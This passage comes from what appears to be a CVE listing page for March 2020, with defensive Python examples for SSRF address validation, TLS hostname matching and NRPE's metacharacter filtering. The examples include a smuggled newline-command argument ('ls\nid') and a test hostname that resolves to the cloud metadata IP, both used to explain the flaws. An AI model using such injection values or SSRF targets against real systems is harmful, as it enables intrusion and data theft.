The Newton application through 10.0.23 for Android allows XSS via an event attribute and arbitrary file loading via a src attribute, if the application has the READ_EXTERNAL_STORAGE permission.

4.3
2020-03-18 CVE-2019-10178 Dogtagpki Cross-Site Scripting vulnerability in Dogtagpki

It was found that the Token Processing Service (TPS) did not properly sanitize the Token IDs from the "Activity" page, enabling a Stored Cross Site Scripting (XSS) vulnerability.

4.3
2020-03-18 CVE-2020-6976 Deltaww Out-Of-Bounds Read vulnerability in Deltaww Cncsoft Screeneditor 1.00.88/1.00.96

Delta Industrial Automation CNCSoft ScreenEditor v1.00.96 and prior is affected by an out-of-bounds read.

4.3
2020-03-18 CVE-2020-4199 IBM Cross-Site Request Forgery (CSRF) vulnerability in IBM Tivoli Netcool/Omnibus 8.1.0

IBM Tivoli Netcool/OMNIbus 8.1.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.

4.3
2020-03-18 CVE-2020-9443 Zulipchat Cross-Site Scripting vulnerability in Zulipchat Zulip Desktop

Zulip Desktop before 4.0.3 loaded untrusted content in an Electron webview with web security disabled, which can be exploited for XSS in a number of ways.

4.3
2020-03-18 CVE-2019-14884 Moodle Cross-Site Scripting vulnerability in Moodle

A vulnerability was found in Moodle 3.7 before 3.7.3, 3.6 before 3.6.7 and 3.5 before 3.5.9, where a reflected XSS is possible from some fatal error messages.

4.3
2020-03-18 CVE-2019-14883 Moodle Incorrect Authorization vulnerability in Moodle

A vulnerability was found in Moodle 3.6 before 3.6.7 and 3.7 before 3.7.3, where tokens used to fetch inline attachments in email notifications were not disabled when a user's account was no longer active.

4.3
2020-03-18 CVE-2019-14881 Moodle Cross-Site Scripting vulnerability in Moodle 3.7.0/3.7.1

A vulnerability was found in Moodle 3.7 before 3.7.3, where there is blind XSS reflected in some locations where the user email is displayed.

4.3
2020-03-17 CVE-2020-10114 Cpanel Cross-Site Scripting vulnerability in Cpanel

cPanel before 84.0.20 allows stored self-XSS via the HTML file editor (SEC-535).

4.3
2020-03-17 CVE-2020-10113 Cpanel Cross-Site Scripting vulnerability in Cpanel

cPanel before 84.0.20 allows self XSS via a temporary character-set specification (SEC-515).

4.3
2020-03-17 CVE-2019-20493 Cpanel Cross-Site Scripting vulnerability in Cpanel

cPanel before 82.0.18 allows self-XSS because JSON string escaping is mishandled (SEC-520).

4.3
2020-03-16 CVE-2020-6175 Citrix Improper Certificate Validation vulnerability in Citrix Sd-Wan Center and Netscaler Sd-Wan Center

Citrix SD-WAN 10.2.x before 10.2.6 and 11.0.x before 11.0.3 has Missing SSL Certificate Validation.

4.3
2020-03-16 CVE-2019-19613 Halvotec Open Redirect vulnerability in Halvotec Raquest 10.23.10801.0

An issue was discovered in Halvotec RaQuest 10.23.10801.0.

4.3
2020-03-16 CVE-2020-10242 Joomla Cross-Site Scripting vulnerability in Joomla Joomla!

An issue was discovered in Joomla! before 3.9.16.

4.3
2020-03-16 CVE-2019-19211 Dolibarr Cross-Site Scripting vulnerability in Dolibarr

Dolibarr ERP/CRM before 10.0.3 has an Insufficient Filtering issue that can lead to user/card.php XSS.

4.3
2020-03-16 CVE-2019-14512 Limesurvey Cross-Site Scripting vulnerability in Limesurvey 3.17.7+190627

LimeSurvey 3.17.7+190627 has XSS via Boxes in application/extensions/PanelBoxWidget/views/box.php or a label title in application/views/admin/labels/labelview_view.php.

4.3
2020-03-16 CVE-2018-10125 Contao Cross-Site Scripting vulnerability in Contao

Contao before 4.5.7 has XSS in the system log.

4.3
2020-03-20 CVE-2020-8139 Nextcloud Missing Authorization vulnerability in Nextcloud Server

A missing access control check in Nextcloud Server < 18.0.1, < 17.0.4, and < 16.0.9 causes hide-download shares to be downloadable when appending /download to the URL.

4.0
2020-03-20 CVE-2020-8138 Nextcloud Server-Side Request Forgery (SSRF) vulnerability in Nextcloud Server

A missing check for IPv4 nested inside IPv6 in Nextcloud server < 17.0.1, < 16.0.7, and < 15.0.14 allowed a Server-Side Request Forgery (SSRF) vulnerability when subscribing to a malicious calendar URL.

4.0
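The Nextcloud SSRF entry above turns on a detail worth seeing in code: a destination check that only recognises IPv4 literals never examines the same address wrapped in an IPv6 form such as ::ffff:127.0.0.1. The Python below is an added example for this page, not Nextcloud code; the resolver table, hostnames and addresses are constructed, and the unwrapping covers the IPv4-mapped, 6to4 and Teredo forms that Python's ipaddress module exposes.

```python
import ipaddress
from typing import Callable, Iterable, Optional
from urllib.parse import urlsplit

# Constructed stand-in for DNS so the example runs offline. A real check
# would call socket.getaddrinfo() and must inspect *every* returned record.
FAKE_DNS = {
    "calendar.example.net": ["93.184.216.34", "2606:2800:220:1:248:1893:25c8:1946"],
    "evil.example.org": ["::ffff:169.254.169.254"],   # metadata IP, IPv4-mapped
}


def naive_blocks(ip_text: str) -> bool:
    """The flawed pattern: only IPv4 literals are compared with the denylist,
    so an IPv4 address nested inside an IPv6 literal is never examined."""
    addr = ipaddress.ip_address(ip_text)
    if addr.version == 4:
        return not addr.is_global
    return False  # IPv6 falls through unexamined


def unwrap_ipv4(addr):
    """Reduce IPv6 transition addresses to the IPv4 address they carry."""
    if isinstance(addr, ipaddress.IPv6Address):
        if addr.ipv4_mapped is not None:      # ::ffff:a.b.c.d
            return addr.ipv4_mapped
        if addr.sixtofour is not None:        # 2002:AABB:CCDD::/48
            return addr.sixtofour
        if addr.teredo is not None:           # 2001:0::/32 -> (server, client)
            return addr.teredo[1]
    return addr


def is_safe_address(ip_text: str) -> bool:
    """True only for a globally routable unicast address after unwrapping.
    is_global excludes loopback, link-local (169.254/16 metadata), RFC 1918,
    unique-local, documentation and reserved ranges."""
    addr = unwrap_ipv4(ipaddress.ip_address(ip_text))
    return addr.is_global and not addr.is_multicast


def is_safe_url(url: str,
                resolve: Callable[[str], Optional[Iterable[str]]] = FAKE_DNS.get) -> bool:
    """Accept an http(s) URL only if every address it can reach is safe."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname            # brackets already stripped for IPv6 literals
    try:
        ipaddress.ip_address(host)
        candidates = [host]
    except ValueError:
        candidates = resolve(host)
        if not candidates:
            return False             # unresolvable: fail closed
    return all(is_safe_address(ip) for ip in candidates)
```

In a real subscription handler, resolve once, validate every returned address, then connect to the validated address rather than re-resolving the name (otherwise a rebinding resolver defeats the check), and repeat the check on every redirect the calendar server returns.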
2020-03-20 CVE-2020-10194 Zimbra Incorrect Authorization vulnerability in Zimbra Zm-Mailbox

cs/service/account/AutoCompleteGal.java in Zimbra zm-mailbox before 8.8.15.p8 allows authenticated users to request any GAL account.

4.0
2020-03-20 CVE-2019-15664 Killernetworking Out-Of-Bounds Read vulnerability in Killernetworking Killer Control Center

An issue was discovered in Rivet Killer Control Center before 2.1.1352.

4.0
2020-03-20 CVE-2019-15663 Killernetworking Out-Of-Bounds Read vulnerability in Killernetworking Killer Control Center

An issue was discovered in Rivet Killer Control Center before 2.1.1352.

4.0
2020-03-20 CVE-2019-15662 Killernetworking Out-Of-Bounds Read vulnerability in Killernetworking Killer Control Center

An issue was discovered in Rivet Killer Control Center before 2.1.1352.

4.0
2020-03-20 CVE-2019-19486 Centreon Path Traversal vulnerability in Centreon

Local File Inclusion in minPlayCommand.php in Centreon (19.04.4 and below) allows an attacker to traverse paths via a plugin test.

4.0
2020-03-20 CVE-2019-19026 Cncf, Pivotal SQL Injection vulnerability in multiple products

Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows SQL Injection via project quotas in the VMware Harbor Container Registry for the Pivotal Platform.

4.0
2020-03-19 CVE-2019-16062 Netsas Missing Encryption of Sensitive Data vulnerability in Netsas Enigma Network Management Solution

NETSAS Enigma NMS 65.0.0 and prior does not encrypt sensitive data stored within the SQL database.

4.0
2020-03-19 CVE-2019-14878 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

In the __d2b function of the newlib libc library, all versions prior to 3.3.0 (see newlib/libc/stdlib/mprec.c), Balloc is used to allocate a big integer, however no check is performed to verify if the allocation succeeded or not.

4.0
2020-03-19 CVE-2019-14877 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

In the __mdiff function of the newlib libc library, all versions prior to 3.3.0 (see newlib/libc/stdlib/mprec.c), Balloc is used to allocate big integers, however no check is performed to verify if the allocation succeeded or not.

4.0
2020-03-19 CVE-2019-14876 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

In the __lshift function of the newlib libc library, all versions prior to 3.3.0 (see newlib/libc/stdlib/mprec.c), Balloc is used to allocate a big integer, however no check is performed to verify if the allocation succeeded or not.

4.0
2020-03-19 CVE-2019-14875 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

In the __multiply function of the newlib libc library, all versions prior to 3.3.0 (see newlib/libc/stdlib/mprec.c), Balloc is used to allocate a big integer, however no check is performed to verify if the allocation succeeded or not.

4.0
2020-03-19 CVE-2019-14874 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

In the __i2b function of the newlib libc library, all versions prior to 3.3.0 (see newlib/libc/stdlib/mprec.c), Balloc is used to allocate a big integer, however no check is performed to verify if the allocation succeeded or not.

4.0
2020-03-19 CVE-2019-14873 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

In the __multadd function of the newlib libc library, prior to version 3.3.0 (see newlib/libc/stdlib/mprec.c), Balloc is used to allocate a big integer, however no check is performed to verify if the allocation succeeded or not.

4.0
2020-03-19 CVE-2020-4203 IBM Information Exposure vulnerability in IBM Datapower Gateway

IBM DataPower Gateway 2018.4.1.0 through 2018.4.1.8 could potentially disclose highly sensitive information to a privileged user due to improper access controls.

4.0
2020-03-19 CVE-2019-14872 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

The _dtoa_r function of the newlib libc library, prior to version 3.3.0, performs multiple memory allocations without checking their return value.

4.0
2020-03-18 CVE-2019-19677 Arxes Tolina Information Exposure vulnerability in Arxes-Tolina 3.0.0

arxes-tolina 3.0.0 allows User Enumeration.

4.0
2020-03-18 CVE-2020-10365 Logicaldoc SQL Injection vulnerability in Logicaldoc

LogicalDoc before 8.3.3 allows SQL Injection.

4.0
2020-03-18 CVE-2019-12122 Onap Cleartext Transmission of Sensitive Information vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP Portal through Dublin.

4.0
2020-03-18 CVE-2019-14871 Newlib Project Null Pointer Dereference vulnerability in Newlib Project Newlib

The REENT_CHECK macro (see newlib/libc/include/sys/reent.h) as used by REENT_CHECK_TM, REENT_CHECK_MISC, REENT_CHECK_MP and other newlib macros in versions prior to 3.3.0, does not check for memory allocation problems when the DEBUG flag is unset (as is the case in production firmware builds).

4.0
2020-03-18 CVE-2020-10659 Entrustdatacard Improper Certificate Validation vulnerability in Entrustdatacard Entelligence Security Provider

Entrust Entelligence Security Provider (ESP) before 10.0.60 on Windows mishandles errors during SSL Certificate Validation, leading to situations where (for example) a user continues to interact with a web site that has an invalid certificate chain.

4.0
2020-03-17 CVE-2019-20495 Cpanel Information Exposure vulnerability in Cpanel

cPanel before 82.0.18 allows attackers to read an arbitrary database via MySQL dump streaming (SEC-531).

4.0
2020-03-17 CVE-2019-20407 Atlassian Missing Authorization vulnerability in Atlassian Jira Software Data Center

The ConfigureBambooRelease resource in Jira Software and Jira Software Data Center before version 8.6.1 allows authenticated remote attackers to view release version information in projects that they do not have access to, through a missing authorisation check.

4.0
2020-03-17 CVE-2019-20105 Atlassian Missing Authentication for Critical Function vulnerability in Atlassian Application Links

The EditApplinkServlet resource in the Atlassian Application Links plugin before version 5.4.20, from version 6.0.0 before version 6.0.12, from version 6.1.0 before version 6.1.2, from version 7.0.0 before version 7.0.1, and from version 7.1.0 before version 7.1.3 allows remote attackers who have obtained access to an administrator's session to reach the EditApplinkServlet resource without re-authenticating to pass "WebSudo", in products that support "WebSudo", through an improper access control vulnerability.

4.0
2020-03-16 CVE-2020-9472 Umbraco Unrestricted Upload of File With Dangerous Type vulnerability in Umbraco CMS 8.5.3

Umbraco CMS 8.5.3 allows an authenticated file upload (and consequently Remote Code Execution) via the Install Package functionality.

4.0
2020-03-16 CVE-2020-7916 Thimpress Improper Privilege Management vulnerability in Thimpress Learnpress

be_teacher in class-lp-admin-ajax.php in the LearnPress plugin 3.2.6.5 and earlier for WordPress allows any registered user to assign itself the teacher role via the wp-admin/admin-ajax.php?action=learnpress_be_teacher URI without any additional permission checks.

4.0
2020-03-16 CVE-2019-19946 Dradisframework Information Exposure vulnerability in Dradisframework Dradis 3.4.1

The API in Dradis Pro 3.4.1 allows any user to extract the content of a project, even if this user is not part of the project team.

4.0
2020-03-16 CVE-2020-6584 Nagios Improper Privilege Management vulnerability in Nagios 2.1.3

Nagios Log Server 2.1.3 has Incorrect Access Control.

4.0
2020-03-16 CVE-2019-4656 IBM, HP, Linux, Microsoft, Oracle Improper Input Validation vulnerability in IBM MQ, MQ Appliance and Websphere MQ

IBM MQ and IBM MQ Appliance 7.1, 7.5, 8.0, 9.0 LTS, 9.1 LTS, and 9.1 CD is vulnerable to a denial of service attack that would allow an authenticated user to crash the queue and require a restart due to an error processing error messages.

4.0
2020-03-16 CVE-2019-10091 Apache Improper Certificate Validation vulnerability in Apache Geode 1.9.0

When TLS is enabled with ssl-endpoint-identification-enabled set to true, Apache Geode fails to perform hostname verification of the entries in the certificate SAN during the SSL handshake.

4.0
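The Geode entry is a case of TLS endpoint identification that never compares the presented name with the certificate's Subject Alternative Name. The Python below is an added example, not Geode or Python ssl-module code; the SAN list is constructed in the shape ssl.getpeercert() reports, and the matcher applies the RFC 6125 rules most TLS stacks use (a single wildcard only as the entire left-most label, IP literals matched only against iPAddress entries).

```python
import ipaddress
from typing import Sequence, Tuple

# Constructed SAN list in the (type, value) form that ssl.getpeercert()
# returns under "subjectAltName"; this is sample data for the example.
SAN = [
    ("DNS", "locator.example.com"),
    ("DNS", "*.geode.example.com"),
    ("IP Address", "10.0.0.5"),
]


def _dns_name_matches(pattern: str, hostname: str) -> bool:
    """Case-insensitive dNSName match. A wildcard is honoured only when it is
    the whole left-most label, covers exactly one label, and the pattern has
    at least two further labels (so '*.com' never matches anything)."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:]


def hostname_matches_san(hostname: str, san: Sequence[Tuple[str, str]]) -> bool:
    """The check endpoint identification must perform after the handshake:
    the name the client connected to has to appear in the SAN extension."""
    try:
        ip = ipaddress.ip_address(hostname)
    except ValueError:
        ip = None
    for kind, value in san:
        if ip is not None:
            # An IP literal matches only an iPAddress entry, never a dNSName.
            if kind == "IP Address" and ipaddress.ip_address(value) == ip:
                return True
        elif kind == "DNS" and _dns_name_matches(value, hostname):
            return True
    return False
```

A client that enables identification but skips this comparison accepts any certificate chaining to a trusted CA, so a valid certificate for an unrelated host is enough to sit in the middle. Python's ssl module performs an equivalent check when SSLContext.check_hostname is left at its default of True.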

45 Low Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2020-03-16 CVE-2020-6581 Nagios, Fedoraproject Injection vulnerability in multiple products

Nagios NRPE 3.2.1 has Insufficient Filtering because, for example, nasty_metachars interprets \n as the character \ and the character n (not as the \n newline sequence).

3.7
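The NRPE entry describes a filter whose configured denylist is read literally, so a two-character `\n` written in the config never becomes a newline and a real newline in an argument sails through. The Python below is an added example, not NRPE code; the default metacharacter list is an approximation assumed for the example, and the argument strings are constructed.

```python
# Approximation of NRPE's default nasty_metachars, assumed for this example.
# Written as a raw string so it holds what the config file literally contains.
NRPE_DEFAULT_NASTY = r"|`&><'\"\\[]{};"

# What the daemon sees when an operator appends \r\n to the value in nrpe.cfg:
# a backslash, the letter r, a backslash and the letter n, not CR and LF.
CONFIGURED_NASTY = NRPE_DEFAULT_NASTY + r"\r\n"

_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "\\": "\\", "0": "\0"}


def decode_escapes(raw: str) -> str:
    """Turn C-style two-character escapes in a config value into the single
    control characters they denote. Unknown escapes are kept verbatim."""
    out = []
    i = 0
    while i < len(raw):
        ch = raw[i]
        if ch == "\\" and i + 1 < len(raw) and raw[i + 1] in _ESCAPES:
            out.append(_ESCAPES[raw[i + 1]])
            i += 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def contains_nasty(arg: str, nasty_chars: str) -> bool:
    """Reject an argument if any of its characters is in the denylist."""
    return any(c in nasty_chars for c in arg)


# Two constructed plugin arguments: one carries a real newline (a second
# command for the shell), the other is a harmless service name.
INJECTED_ARG = "ls\nid"
BENIGN_ARG = "nginx"
```

Against the literal list, the injected argument passes while "nginx" is rejected for containing the letter n; decoding the escapes before filtering gives the intended result in both cases. The safer design avoids the question entirely: pass plugin arguments with execve-style argument vectors rather than through a shell.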
2020-03-20 CVE-2020-1879 Huawei Improper Validation of Integrity Check Value vulnerability in Huawei products

There is an improper integrity checking vulnerability in some Huawei products.

3.6
2020-03-16 CVE-2020-1735 Redhat Path Traversal vulnerability in Redhat products

A flaw was found in the Ansible Engine when the fetch module is used.

3.6
2020-03-16 CVE-2019-4617 IBM, Linux Session Fixation vulnerability in IBM Cloud Automation Manager 3.2.1.0

IBM Cloud Automation Manager 3.2.1.0 does not renew a session variable after a successful authentication which could lead to session fixation/hijacking vulnerability.

3.6
2020-03-22 CVE-2020-10821 Nagios Cross-Site Scripting vulnerability in Nagios XI 5.6.11

Nagios XI 5.6.11 allows XSS via the account/main.php theme parameter.

3.5
2020-03-22 CVE-2020-10820 Nagios Cross-Site Scripting vulnerability in Nagios XI 5.6.11

Nagios XI 5.6.11 allows XSS via the includes/components/ldap_ad_integration/ password parameter.

3.5
2020-03-22 CVE-2020-10819 Nagios Cross-Site Scripting vulnerability in Nagios XI 5.6.11

Nagios XI 5.6.11 allows XSS via the includes/components/ldap_ad_integration/ username parameter.

3.5
2020-03-22 CVE-2020-10803 Phpmyadmin, Debian Cross-Site Scripting vulnerability in multiple products

In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability was discovered where malicious code could be used to trigger an XSS attack through retrieving and displaying results (in tbl_get_field.php and libraries/classes/Display/Results.php).

3.5
2020-03-20 CVE-2020-1696 Redhat, Dogtagpki Cross-Site Scripting vulnerability in multiple products

A flaw was found in all pki-core 10.x.x versions, where the Token Processing Service (TPS) did not properly sanitize Profile IDs, enabling a Stored Cross-Site Scripting (XSS) vulnerability when the profile ID is printed.

3.5
2020-03-20 CVE-2020-10681 Cmsmadesimple Cross-Site Scripting vulnerability in Cmsmadesimple CMS Made Simple 2.2.13

The Filemanager in CMS Made Simple 2.2.13 has stored XSS via a .pxd file, as demonstrated by m1_files[] to admin/moduleinterface.php.

3.5
2020-03-19 CVE-2020-5267 Rubyonrails, Debian Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in multiple products

In ActionView before versions 6.0.2.2 and 5.2.4.2, there is a possible XSS vulnerability in ActionView's JavaScript literal escape helpers.

3.5
2020-03-19 CVE-2019-16375 Otrs Cross-Site Scripting vulnerability in Otrs

An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.11, and Community Edition 5.0.x through 5.0.37 and 6.0.x through 6.0.22.

3.5
2020-03-19 CVE-2019-16010 Cisco Cross-Site Scripting vulnerability in Cisco Sd-Wan Firmware

A vulnerability in the web UI of the Cisco SD-WAN vManage software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of the vManage software.

3.5
2020-03-18 CVE-2020-7258 Mcafee Cross-Site Scripting vulnerability in Mcafee Network Security Manager

Cross site scripting vulnerability in McAfee Network Security Management (NSM) prior to 9.1 Update 6 (March 2020 update) allows attackers to have an unspecified impact via unspecified vectors.

3.5
2020-03-18 CVE-2020-7256 Mcafee Cross-Site Scripting vulnerability in Mcafee Network Security Manager

Cross site scripting vulnerability in McAfee Network Security Management (NSM) prior to 9.1 Update 6 (March 2020 update) allows attackers to have an unspecified impact via unspecified vectors.

3.5
2020-03-17 CVE-2020-1720 Postgresql, Redhat Missing Authorization vulnerability in multiple products

A flaw was found in PostgreSQL's "ALTER ...

3.5
2020-03-17 CVE-2020-10596 Opencart Cross-Site Scripting vulnerability in Opencart 3.0.3.2

OpenCart 3.0.3.2 allows remote authenticated users to conduct XSS attacks via a crafted filename in the users' image upload section.

3.5
2020-03-17 CVE-2019-20497 Cpanel Cross-Site Scripting vulnerability in Cpanel

cPanel before 82.0.18 allows stored XSS via WHM Backup Restoration (SEC-533).

3.5
2020-03-17 CVE-2020-6646 Fortinet Cross-Site Scripting vulnerability in Fortinet Fortiweb

An improper neutralization of input vulnerability in FortiWeb allows a remote authenticated attacker to perform a stored cross site scripting attack (XSS) via the Disclaimer Description of a Replacement Message.

3.5
2020-03-16 CVE-2019-19852 Sangoma Cross-Site Scripting vulnerability in Sangoma Freepbx

An XSS Injection vulnerability exists in Sangoma FreePBX and PBXact 13, 14, and 15 within the Call Event Logging report screen in the cel module at the admin/config.php?display=cel URI via date fields.

3.5
2020-03-16 CVE-2019-19615 Sangoma Cross-Site Scripting vulnerability in Sangoma Freepbx 14.0.10.2/14.0.10.3/14.0.10.7

Multiple XSS vulnerabilities exist in the Backup & Restore module v14.0.10.2 through v14.0.10.7 for FreePBX, as shown at /admin/config.php?display=backup on the FreePBX Administrator web site.

3.5
2020-03-16 CVE-2019-19612 Halvotec Cross-Site Scripting vulnerability in Halvotec Raquest 10.23.10801.0

An issue was discovered in Halvotec RaQuest 10.23.10801.0.

3.5
2020-03-16 CVE-2019-19461 Teampasswordmanager Cross-Site Scripting vulnerability in Teampasswordmanager Team Password Manager

Post-authentication Stored XSS in Team Password Manager through 7.93.204 allows attackers to steal other users' credentials by creating a shared password with HTML code as the title.

3.5
2020-03-16 CVE-2020-6586 Nagios Cross-Site Scripting vulnerability in Nagios 2.1.3

Nagios Log Server 2.1.3 allows XSS by visiting /profile and entering a crafted name field that is mishandled on the /admin/users page.

3.5
2020-03-16 CVE-2019-19941 Swisscom Cross-Site Scripting vulnerability in Swisscom Centro Grande Firmware 6.12.02/6.14.00

Missing hostname validation in Swisscom Centro Grande before 6.16.12 allows a remote attacker to inject its local IP address as a domain entry in the DNS service of the router via crafted hostnames in DHCP requests, causing XSS.

3.5
2020-03-16 CVE-2019-19851 Sangoma Cross-Site Scripting vulnerability in Sangoma Freepbx

An XSS Injection vulnerability exists in Sangoma FreePBX and PBXact 13, 14, and 15 within the Debug/Test page of the Superfecta module at the admin/config.php?display=superfecta URI.

3.5
2020-03-16 CVE-2019-19210 Dolibarr Cross-Site Scripting vulnerability in Dolibarr

Dolibarr ERP/CRM before 10.0.3 allows XSS because uploaded HTML documents are served as text/html despite being renamed to .noexe files.

3.5
2020-03-19 CVE-2019-20485 Redhat, Debian Improper Input Validation vulnerability in multiple products

qemu/qemu_driver.c in libvirt before 6.0.0 mishandles the holding of a monitor job during a query to a guest agent, which allows attackers to cause a denial of service (API blockage).

2.7
2020-03-18 CVE-2019-10146 Redhat, Dogtagpki Cross-Site Scripting vulnerability in multiple products

A Reflected Cross Site Scripting flaw was found in all pki-core 10.x.x versions, because the CA Agent Service of the pki-core server does not properly sanitize the certificate request page.

2.6
2020-03-16 CVE-2020-1738 Redhat Argument Injection or Modification vulnerability in Redhat products

A flaw was found in Ansible Engine when the module package or service is used and the parameter 'use' is not specified.

2.6
2020-03-20 CVE-2020-1878 Huawei Improper Authentication vulnerability in Huawei Oxfords-An00A Firmware

Huawei smartphone OxfordS-AN00A with versions earlier than 10.0.1.152D(C735E152R3P3) and versions earlier than 10.0.1.160(C00E160R4P1) has an improper authentication vulnerability.

2.1
2020-03-20 CVE-2020-1862 Huawei Double Free vulnerability in Huawei Campusinsight and Manageone

There is a double free vulnerability in some Huawei products.

2.1
2020-03-20 CVE-2020-1795 Huawei Unspecified vulnerability in Huawei Mate 20 Firmware and Mate 30 PRO Firmware

There is a logic error vulnerability in several smartphones.

2.1
2020-03-20 CVE-2020-1794 Huawei Improper Authentication vulnerability in Huawei Mate 20 Firmware and Mate 30 PRO Firmware

There is an improper authentication vulnerability in several smartphones.

2.1
2020-03-20 CVE-2020-1793 Huawei Improper Authentication vulnerability in Huawei Mate 20 Firmware and Mate 30 PRO Firmware

There is an improper authentication vulnerability in several smartphones.

2.1
2020-03-19 CVE-2020-5262 Easybuild Project Insecure Storage of Sensitive Information vulnerability in Easybuild Project Easybuild

In EasyBuild before version 4.1.2, the GitHub Personal Access Token (PAT) used by EasyBuild for the GitHub integration features (like `--new-pr`, `--from-pr`, etc.) is shown in plain text in EasyBuild debug log files.

2.1
2020-03-18 CVE-2019-19335 Redhat Incorrect Permission Assignment for Critical Resource vulnerability in Redhat Openshift 4.0/4.2

During installation of an OpenShift 4 cluster, the `openshift-install` command line tool creates an `auth` directory, with `kubeconfig` and `kubeadmin-password` files.

2.1
2020-03-17 CVE-2020-3951 Vmware Out-Of-Bounds Write vulnerability in VMWare Horizon Client and Workstation

VMware Workstation (15.x before 15.5.2) and Horizon Client for Windows (5.x and prior before 5.4.0) contain a denial-of-service vulnerability due to a heap-overflow issue in Cortado Thinprint.

2.1
2020-03-17 CVE-2019-20494 Cpanel Improper Input Validation vulnerability in Cpanel

In cPanel before 82.0.18, Cpanel::Rand::Get can produce a predictable series of numbers (SEC-525).

2.1
2020-03-16 CVE-2020-6980 Rockwellautomation Cleartext Storage of Sensitive Information vulnerability in Rockwellautomation products

Rockwell Automation MicroLogix 1400 Controllers Series B v21.001 and prior, Series A (all versions), MicroLogix 1100 Controller (all versions), and RSLogix 500 Software v12.001 and prior: if Simple Mail Transfer Protocol (SMTP) account data is saved in RSLogix 500, a local attacker with access to a victim's project may be able to gather SMTP server authentication data, as it is written to the project file in cleartext.

2.1
2020-03-16 CVE-2020-1736 Redhat Incorrect Permission Assignment for Critical Resource vulnerability in Redhat products

A flaw was found in Ansible Engine when a file is moved using atomic_move primitive as the file mode cannot be specified.

2.1
2020-03-16 CVE-2019-4719 IBM, HP, Linux, Microsoft, Oracle Unspecified vulnerability in IBM MQ, MQ Appliance and Websphere MQ

IBM MQ and IBM MQ Appliance 7.1, 7.5, 8.0, 9.0 LTS, 9.1 LTS, and 9.1 CD could allow a local attacker to obtain sensitive information by inclusion of sensitive data within runmqras data.

2.1
2020-03-16 CVE-2019-4619 IBM, HP, Linux, Microsoft, Oracle Information Exposure Through an Error Message vulnerability in IBM MQ, MQ Appliance and Websphere MQ

IBM MQ and IBM MQ Appliance 7.1, 7.5, 8.0, 9.0 LTS, 9.1 LTS, and 9.1 CD could allow a local attacker to obtain sensitive information by inclusion of sensitive data within trace.

2.1
2020-03-16 CVE-2020-1753 Redhat Information Exposure Through Log Files vulnerability in Redhat Ansible Engine

A security flaw was found in Ansible Engine, all Ansible 2.7.x versions prior to 2.7.17, all Ansible 2.8.x versions prior to 2.8.11 and all Ansible 2.9.x versions prior to 2.9.7, when managing kubernetes using the k8s module.

2.1
2020-03-16 CVE-2020-1740 Redhat Information Exposure vulnerability in Redhat products

A flaw was found in Ansible Engine when using Ansible Vault for editing encrypted files.

1.9